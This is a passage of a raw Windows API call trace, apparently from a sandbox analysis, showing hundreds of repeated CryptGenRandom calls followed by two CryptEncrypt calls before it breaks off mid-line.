pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.541] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0160.542] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, 